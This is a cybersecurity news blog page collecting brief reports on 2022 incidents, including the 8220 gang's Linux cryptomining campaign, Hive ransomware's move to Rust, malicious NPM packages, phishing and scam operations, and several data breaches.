Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

security threat
Chineses Hackers cryptomining malware Security Bug security threat

Microsoft Warns of '8220 Group' Targeting Linux Servers

 

Microsoft Security Intelligence experts have issued a new warning against a known cloud threat actor (TA) group, dubbed 8220, targeting Linux servers to install crypto miners. 

“We observed notable updates to the long-running malware campaign targeting Linux systems by a group known as the 8220 gang. The updates include the deployment of new versions of a crypto miner and an IRC bot, as well the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a series of tweets. 

According to Cisco's Talos Intelligence group, the 8220 gang has been operating since at least 2017, and primarily focuses on crypto mining campaigns. The threat actors are Chinese-speaking, the names of the group come from the port number 8220 used by the miner to communicate with the C2 servers. 

Over the past year, the group has actively upgraded its methodologies and payloads. In a recent campaign, the hacking group targeted i686 and x86_64 Linux systems and employed RCE exploits for CVE-2022-26134 (Atlassian Confluence) and CVE-2019-2725 (Oracle WebLogic) for initial access, Microsoft researchers stated. 

Once secured access to a target system, an evasive loader is downloaded from jira[.]letmaker[.]top. The loader eludes detection by clearing log files and disabling cloud monitoring and security tools. 

Subsequently, the loader downloads the pwnRig crypto miner and an IRC bot that runs commands from a command-and-control (C2) server. It would then maintain persistence by designing either a cron job or a script running every 60 seconds as nohup. 

“The loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts.” 

To guard networks against this threat, Microsoft urged organizations to secure systems and servers, apply updates, and use good credential hygiene. “Microsoft Defender for Endpoint on Linux detects malicious behaviors and payloads related to this campaign.” 

The findings come after Akamai disclosed that the Atlassian Confluence vulnerability is experiencing a steady 20,000 exploitation attempts per day that are executed from nearly 6,000 IPs. However, these figures represent a substantial decline when compared to the peak of 100,000 the company witnessed upon the bug disclosure on June 02, 2022.
Read more »
Rust
botnet Golang Cyber Security Hive Programming Ransomware Rust

Hive Gang Changes Programming from Go to Rust

About Hive Ransomware

Microsoft Security researchers found new versions of Hive ransomware written in the Go programming language but now in Rust. Hive surfaced in June 2021, it was found by the FBI in August. In November, Mediamarkt, a European electronics retail company was hit by Hive. 

It's a RaaS (Ransomware as a service) double extortion gang that has recently been attacking vulnerable Microsoft Exchange Servers, compromised VPN credentials, phishing, and vulnerable RDP servers to install the ransomware and steal information that can be leaked. 

Why the change from Go to Rust

The Rust change from Hive has been underway for quite some time, it took its lessons from BlackCat ransomware, written in Rust as well. Researchers from Group-IB in March discovered that Hive changed its Linux encryptor (for attacking VMware ESXi servers) to Rust to make it difficult for cybersecurity experts to monitor the ransom talks with targets. 

The Rust rewrite is much easier, Microsoft Threat Intelligence Center in its blog said, "the upgrades in the latest variant [of Hive] are effectively an overhaul: the most notable changes include a full code migration to another programming language and the use of a more complex encryption method. 

What is the impact

The implications of these updates are far-reaching, we should consider that Hive is a RaaS payload that Microsoft found in attacks against organizations in the software and healthcare industries from big ransomware actors like DEV-0237. 

Microsoft has mentioned some advantages of Rust over other languages that make it one of the most preferred languages among programmers, like good crypto library support and better memory security. 

Following are the benefits of Rust language, as per Microsoft: 

  • It offers memory, data type, and thread-safety It has deep control over low-level resources It has a user-friendly syntax 
  • It has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption 
  • It has a good variety of cryptographic libraries 
  • It's relatively more difficult to reverse-engineer 

ZDNet reports "Microsoft found that the new ransom note differs from the one used in older variants. The new note instructs victims: "Do not delete or reinstall VMs. There will be nothing to decrypt" and "Do not modify, rename or delete *.key files. Your data will be undecryptable." The *.key files are the files that Hive has encrypted."

Read more »
URL
Data Breach JavaScript Malicious Code NPM Package Open Source Software Supply Chain Attack URL

Attack Against NPM Software Supply Chain Unearthed

 

Iconburst's most recent attack is described as a massive and well-planned effort to spread malicious Javascript packages distributed through the open-source NPM package system.

Upon further analysis, evidence of a planned supply chain assault was found, with numerous NPM packages containing jQuery scripts created to steal data from deployed apps that use them, as per researchers.

ReversingLabs noted that the malicious packages we identified are probably used by hundreds or thousands of downstream mobile and desktop programs as well as websites, even if the full scope of this assault is still unknown. In one instance, malicious software had been downloaded more than 17,000 times.

Obfuscation used 

The firm said that its analysis of the modules had found signs of coordination, with malicious modules linked to a select group of NPM publishers and recurrent patterns in the infrastructure that supported them, such as unencrypted domains.

“The revelation of a javascript obfuscator was the first trigger for our team to examine a broad variety of NPM packages, the majority of which had been released within the previous two months and utilized the stated obfuscator. It revealed more than 20 NPM packages in total. When these NPM modules are examined in greater detail, it becomes clear that they are associated with one of a small number of NPM accounts with names like ionic-io, arpanrizki, kbrstore, and aselole,” according to ReversingLabs. 

Meanwhile, Checkmarx said, "Roughly a thousand unique user accounts released over 1200 NPM packages to the registry, which we found. Automation was used, which allowed for the successful completion of the NPM 2FA challenge. At this moment, this collection of packages appears to be a part of an attacker's testing." 

Obfuscated malware data theft 

The de-obfuscated examples underwent a thorough analysis, which showed that every one of them collects form data using jQuery Ajax methods and subsequently exploits that data to different domains controlled by malevolent writers.

To exfiltrate serialized form data to domains under the attacker's control, the malicious packages employ a modified script that extends the functionality of the jQuery ajax() function. The function verifies the URL content before transmitting the data to carry out target filtering checks. 

Attack on supply chain 

The NPM modules which ReversingLabs found have been downloaded more than 27,000 times in total. The attacks occurred for months before coming to attention because very few development firms can identify malicious software within open source libraries and modules.

"It is certain from the report of this study that software development businesses and their clients both require new tools and procedures for evaluating supply chain risks, such as those posed by these malicious NPM packages," researchers told.

"Applications and services are only as secure as their weakest component due to the decentralized and modular nature of application development. The attack's success—more than two dozen malicious modules were made available for download on a well-known package repository, and one of them received 17,000 downloads in just a few weeks—underscores the lax standards for application development and the low barriers that prevent malicious or even vulnerable code from exploiting IT environments and sensitive applications," ReversingLabs further added.
Read more »
data security
cyber attack Cyber Attack Exploit Cyber Attacks cyber theft data security

Hackers Using 'Brute Ratel C4' Red-Teaming Tool to Evade Detection

 

Palo Alto Networks’ Unit 42 security researchers have uncovered that Russian state-sponsored hackers are compromising the latest Brute Ratel C4 or BRc4 red-teaming and adversarial simulation/penetration software in their latest and active attacks in an attempt to stay under the radar and evade detection.

Following the attack, Palo Alto Networks Unit  42 reported that a malware sample was uploaded to the VirusTotal database on May 19, 2022, in which they found a payload associated with Brute Ratel C4, a relatively new advanced toolkit that is designed to avoid detection and response (EDR) and antivirus (AV) capabilities. 

“The sample contained a malicious payload associated with Brute Ratel C4 (BRc4), the newest red-teaming and adversarial attack simulation tool to hit the market. While this capability has managed to stay out of the spotlight and remains less commonly known than its Cobalt Strike brethren, it is no less sophisticated. Instead, this tool is uniquely dangerous in that it was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. Its effectiveness at doing so can clearly be witnessed by the aforementioned lack of detection across vendors on VirusTotal,” said the network in their blog. 

Cyber intelligence at the network believes that malicious actors are targeting entities worldwide, however, they are making their primary targets in South and North America. 

The researchers issued a warning in which they urged the cybersecurity fraternity to investigate the attack and look in-depth for any sign of malware, including the BRc4 tool. 

Researchers have found that the malicious payloads indicate the involvement of the Advanced Persistent Threat group 29,  The Dukes, or Cozy Bear as the tactics employed were similar to this group. CozyBear is a Russian state-sponsored malicious group that was previously involved in the devastating Solar Winds attacks in 2020.

This commercial software was released in 2020 and has since gained over 480 licenses across 350 customers. BRc4 is equipped with a wide variety of features, it provides process injection, capturing screenshots, automating adversary TTPs, uploading and downloading files, support for multiple command-and-control channels, and it also has the ability to keep memory artifacts concealed from anti-malware engines.
Read more »
User Security
Cyber Fraud Phishing Campaign Phishing Gang User Privacy User Security

Ukrainian Authorities Take Down Phishing Gang That Siphoned 100 Million Hryvnias

 

The Ukraine Cyber Police Department and the Pechersk Police Department arrested nine members of a cybercriminal organization that defrauded over 5,000 citizens of Ukraine of more than 100 million hryvnias (about $3.39 million) via phishing attacks. 

The fraudsters designed more than 400 phishing sites for exfiltrating the banking details of Ukrainian citizens under the guise of social security payments from E.U. countries. The malicious landing pages were hosting an application form to fill out to receive financial help from the European Union. 

Some of the phishing sites registered by the hackers included ross0.yolasite[.]com, foundationua[.]com, ua-compensation[.]buzz, www.bless12[.]store, help-compensation[.]xyz, newsukraine10.yolasite[.]com, and euro24dopomoga0.yolasite[.]com, among others. 

“Nine people created and administered more than 400 fake web resources for obtaining banking data of citizens. Through the websites, Ukrainians were offered to form an application for the payment of financial assistance from the countries of the European Union. Using phishing links, victims took surveys and entered bank card details.” reads the advisory published by the Ukrainian Cyber Police. 

Once in possession of the bank details, the malicious hackers carried out unauthorized access to the victim’s online banking and siphoned money from their accounts. The hackers defrauded more than 5,000 citizens, stealing a total amount of more than 100 million hryvnias. 

The law enforcement operation culminated in the seizure of computer equipment, mobile phones, and bank cards as well as the criminal proceeds illicitly obtained through unlawful activities. If the arrested individuals are found guilty of fraud charges under the Criminal Code of Ukraine, they face up to 15 years in prison. 

“Criminal proceedings have been opened under Part 3 of Art. 190 (Fraud), Part 5 of Art. 361 (Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks) of the Criminal Code of Ukraine. Perpetrators may face up to fifteen years in prison.,” the advisory further reads. “The issue of declaring suspicion and selecting preventive measures for the persons involved is being resolved.” 

The local police warned citizens to receive information regarding financial payments only from official sources, avoid clicking on suspicious links, and never provide private and banking information to third parties posing as government organizations.
Read more »
WhatsApp
Cyber Fraud Data Theft Job Scam Malicious Ad MalwareBytes UK Visa WhatsApp

Fraudulent UK Visa Scams Circulate on WhatsApp


According to a Malwarebytes report, individuals working in the UK are being scammed by a recent phishing campaign on WhatsApp. 

Scammers claim in a WhatsApp message that users who are willing to relocate to the UK for work will be eligible for a free visa as well as other perks. 

Bogus scam message 

Scam operators are disseminating information under the pretext of the UK government, promising a free visa and other advantages to anyone who wants to migrate there. The chosen candidates would be given travel and lodging expenses as well as access to medical facilities. 

The WhatsApp chat app is used to transmit to target volumes to start the fraud. Users are informed that the UK is conducting a recruiting drive with more than 186,000 open job positions because the country will require more than 132,000 additional workers by the year 2022. 

The objective of the scam 

When a victim clicks on the scam link, a malicious domain that looks like a website for UK Visas and Immigration is displayed to them. "Apply for thousands of jobs already available in the United Kingdom," is the request made to foreign nationals as per the scam.

The website's goal is to collect victims' names, email addresses, phone numbers, marital statuses, and employment statuses. 

Any information entered into the free application form is instantly 'accepted,' and the user is informed that they "will be provided a work permit, visa, plane tickets, and housing in the UK for free" according to a Malwarebytes report. 


Report fake WhatsApp messages

Users have the option to Report and Block on WhatsApp if they get a message from someone who is not on their contact list. One should disregard these spam communications and use the report button to file a complaint. Additionally, users can block these contacts in order to stop getting future scam messages from them.

Phishing attacks with a Visa theme are a typical occurrence in the world of cybercriminals. A similar hoax circulated several times in the past to entice people looking to work or study abroad.


Read more »
Hospitals
Company Safety Council Cyber Security Hospitals

UK Councils and Hospitals Have Weak Cyber Security, Prone to Cyber Attacks

Weak Cybersecurity Spending

A cybersecurity investigation at UK public services disclosed huge inconsistencies in defense expenditure, hundreds of flaws in websites, and staff e-mail IDs and passwords. All these have been found at one council, and the full details have been posted online. 

The ITV News investigation revealed that a UK council spent a mere amount of €32,000 yearly on its cybersecurity budget. When compared to another council, a relatively smaller one- it had an annual cybersecurity budget of €1m, 30 times more. 

What are the findings

The investigation also disclosed that a hospital had just €10,000 per year for cybersecurity. The investigation hasn't disclosed the names of the public institutions. 

“Realistic funding, along with the right strategies, is vital to safeguard employees and members of the public. Public sector organizations must take steps to not only raise awareness of new and emerging cyber threats but also provide effective security training and support." 

By equipping and empowering employees with the knowledge and know-how to spot and avoid attacks, the UK’s local authorities will be able to remain one step ahead. This isn’t just about technical defenses; it’s about supporting people in their day-to-day lives," said Oz Alashe, CEO and founder CybSafe. 

 According to ITV News, the problems that cyber-attacks have caused are: 

  • Overpriced tax bills 
  • Hospital operations canceled 
  • Incorrect benefit payments 
  • People were forced to vacate their residence 
  • House sales falling 
  • Can't apply for council housing 
  • Private data leaked online 
  • Council houses repair is not done 

The investigation mentioned that experts informed ITV News of their concerns about the lack of understanding and standards for public services related to cybersecurity. In 2021, Gloucester City Council's servers were attacked by Russian threat actors. 

In June, the IT systems of the city council weren't functioning. The authorities had kept €380,000 for fixing and recovering from the incident. In October 2021, the UK council was attacked, leading to 33,645 data breach attacks that happened due to human error in the last five years, the officials say. 

According to InfoSecurity "the data, obtained following a Freedom of Information (FoI) request sent by VPNOverview to 103 county councils in the UK, broke down the number of breaches suffered by each body. The local authority with the worst record for human-caused data breaches was Hampshire County Council, with 3759 incidents since 2016. This included 902 breaches in the year 2018/19. Gloucestershire County Council had the next worst record, suffering 2723 breaches in this period. It also experienced the largest increase from 2016/17 (90) to 2020/21 (1004) of any UK council, a rise of 1016%."

Read more »
Mattax Neu Prater
Cybersecurity Data Breach e-government technologies Mattax Neu Prater

US Eye Clinic Suffers Data Breach, 92,000 Patients Hit

 

A healthcare clinic based in Missouri US named ‘Mattax Neu Prater Eye Center’ has suffered a cyber attack, in the wake of which, the center announced the breach at the end of June. However, the attack took place in December 2021. The center has informed the US regulators of a data breach in which more than 92,000 individuals have been affected.

“This incident has affected eye care practices across the country, and is not specific to Mattax Neu Prater. This data security incident occurred entirely within Eye Care Leaders’ network environment, and there were no other remedial actions available to Mattax Neu Prater,” center added. 

Mattax Neu Prater Eye Center is a premier provider of advanced laser vision correction, such as LASIK, as well as cataract correction and advanced technology replacement lenses in Springfield, Missouri US. It provides surgical and non-surgical care and has reported that the “third-party data security incident” may have compromised the sensitive data of patients. 

“However, a lack of available forensic evidence prevented Eye Care Leaders from ruling out the possibility that some protected health information and personally identifiable information may have been exposed to the bad actor,” the clinic added. 

Further, Mattax Neu Prater said that at present the firm does not hold any evidence of identity theft as a result of the incident, but following the attack, the clinic has informed its patients who might be impacted via postal mail. 

Cybersecurity experts suggest that all healthcare organizations should adopt a zero-trust approach to digital facilities. This approach treats every connected device as a potential intruder until it is accurately verified. According to the Experts, old-school approaches like using firewalls and antivirus software have become less effective. 

Cybersecurity researchers also believe that the best way to protect the system is by deleting passwords altogether. Some other cybersecurity tips that can help healthcare professionals are given below:

• Store patient data on systems that are not connected to the internet. 
• Train staff on phishing attacks and how they work. 
• Use two-factor or multi-factor (biometrics) for logins instead of passwords.
• Never click links in email or download attachments. 
• Encrypt all data so if it is accessed or compromised, it will not be exposed.
Read more »
Employee Data
Bug Bounty Cyber Security Data Privacy data security Employee Data

HackerOne Employee Stole Data From Bug Bounty Reports for Financial Advantages

 

HackerOne has revealed information on a former employee who it alleges accessed company data for personal financial benefit. The unknown individual received information from bug bounty platform security reports and attempted to reveal the same vulnerabilities outside of the site. 

According to HackerOne, he had access to the data between April 4 and June 23, 2022. On June 22, 2022, HackerOne was notified of the problem by a suspicious client who had received similar bug reports from the platform and the person. 

“This is a clear violation of our values, our culture, our policies, and our employment contracts,” the platform stated. 

“In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data. We have since terminated the employee, and further bolstered our defences to avoid similar situations in the future.” 

According to HackerOne, the submitter of this off-platform disclosure "reportedly used intimidating language in conversation with our customer," and the actor's intent was to collect more bounties. HackerOne also stated that, after consulting with lawyers, it will determine if a criminal referral of this situation is necessary. 

A HackerOne spokesperson informed The Daily Swig: “Since the founding of HackerOne, we have honoured our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer internet. 

“At HackerOne, we value the trusted relationships with our customers and the hacking community. It’s important for us to continue to demonstrate transparency as a core tenant of Corporate Security Responsibility and therefore shared this Incident Report.” 

The spokesperson added: “Our Code of Conduct sets the foundation for building trust. We will continue to prioritize coordinated disclosure and to act fast to ensure we uphold these strong standards.”
Read more »
Cybercrimes
British Army Crypo Campaign cryptocurrency cyber attack Cyber Attacks Cybercrimes

Crypto Scam to be Investigated by British Army

 

On Sunday, the UK Ministry of Defence confirmed that the British Army’s YouTube and Twitter accounts were hacked. The hackers were using both handles for their cryptocurrency promotion scams. However, at present Ministry department has not confirmed the exact dates of the takeover, and both accounts appear to be back to normal now. 

“We are aware of a breach of the Army’s Twitter and YouTube accounts and an investigation is underway. The Army takes information security extremely seriously and is resolving the issue. Until the investigation is complete it would be inappropriate to comment further,” The Ministry of Defence Press Office said on Twitter. 

Malicious actors took control of the British Army’s Twitter page, swapping out the organization’s profile picture, bio, and cover photo to make it appear genuine like it was associated with The Possessed NFT collection, and promote crypto giveaway schemes. Meanwhile, its YouTube handle aired livestreams with clips of Elon Musk, Jack Dorsey, and Ark CEO Katie Wood discussing cryptocurrency-directed users to crypto scam websites. 

The clips feature the promotion of “double your money” Bitcoin and Ethereum scams. According to Web3 is Going Great, a similar scheme took place in May. However, it is unclear which group is behind this campaign. 

The malicious actors changed the army’s verified Twitter account name to The Possessed, a project involving a collection of 10,000 animated NFTs with a price floor of 0.58 Ethereum (approximately $1,063). 

According to the Department of Ministry, it is possible that the hack is part of a broader campaign to leverage the recent popularity of The Possessed. On Saturday, the project’s official Twitter handle notified its followers of another verified account that was also hacked to promote an NFT scam using The Possessed brand. 

“The breach of the Army’s Twitter and YouTube accounts that occurred earlier today has been resolved and an investigation is underway. The Army takes information security extremely seriously and until their investigation is complete it would be inappropriate to comment further,” the UK Ministry of Defence Press Office tweeted later.
Read more »
User Security
Cybersecurity data security Password Manager Technology User Privacy User Security

Google Announces Password Manager Updates to Enhance User Security

 

Last week, Google updated its Password Manager service dedicated to users who have been facing troubles with their passwords. 

The users using the Chrome browser can now utilize Google Password Manager's auto-fill option to enable the browsers to remember the passwords and keep them in memory of all the sites which the users are visiting, the company told in a blog post. 

Earlier, users were allowed to add passwords to Google Password Manager only when Google used to prompt the user to enter the password; now, they can manually add passwords at any time. 

Although Google is not yet comfortable with making Password Manager a standalone app, users on Android can now add a shortcut to it on the home screen. Customers can use their iPhones to generate unique, strong passwords for their apps when they opt for Chrome as the default autofill provider. 

Additionally, the built-in Password Checkup feature on Android is receiving an upgrade of its own too. Beyond checking for hacked credentials, it can further highlight weak and reused passwords à la Apple iOS. Google is also expanding the compromised password warnings to Chrome users across all operating systems. 

Last but not least, Google is launching a new "Touch-to-Login" to Chrome on Android that allows users to sign in to websites with a single tap after entering the credentials with autofill. It's worth noting that Apple implemented a similar feature in Safari with iOS 12.2. 

According to Google's blog post, the latest updates and added features have been designed at the Google Safety Engineering Center, where the privacy and security experts work on creating a secured ecosystem for the customers. 

The blogpost further stated, “Of course, our efforts to create a safer web are a truly global effort – from our early work on 2-step verification to our future investments in technologies like passkeys – and these updates that we are rolling out over the next months are an important part of that work.” 

The announcement comes after Verizon’s 2022 Data Breach Investigations Report highlighted that compromised credentials accounted for almost 50% of data breaches.
Read more »
Subscribe to: Comments (Atom)